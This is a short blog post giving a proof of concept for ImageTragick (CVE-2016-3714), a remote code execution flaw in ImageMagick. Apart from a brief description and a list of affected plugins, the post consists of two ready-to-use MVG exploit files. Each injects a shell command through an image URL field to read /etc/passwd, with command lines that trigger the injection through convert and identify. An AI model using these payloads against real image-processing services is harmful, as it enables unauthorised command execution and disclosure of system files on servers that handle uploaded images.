ImageTragick PoC

Back to Posts

ImageTragick PoC

ImageMagick Is On Fire — CVE-2016–3714

There are multiple vulnerabilities in ImageMagick, a package commonly used by web services to process images. One of the vulnerabilities can lead to remote code execution (RCE) if you process user submitted images. The exploit for this vulnerability is being used in the wild.

A number of image processing plugins depend on the ImageMagick library, including, but not limited to, PHP’s imagick, Ruby’s rmagick and paperclip, and nodejs’s imagemagick.

For more information about this vulnerability visit: https://imagetragick.com/ or this pastebin exploit.

PoC & Exploit Code

The exploit is trivial, give it a look:

  • convert

viewbox 0 0 1 1 image over 0,0 0,0 'https://voidsec.com/" || cat /etc/passwd && echo "0'
Usage: convert imagetragick.mvg out.png

convert

  • identify

push graphic-context
viewbox 0 0 640 480
fill 'url(https://voidsec.com/logo.png"|cat "/etc/passwd)'
pop graphic-context

Usage: identify imagetragick.mvg
identify
More PoC can be found here.

Share this post

Back to Posts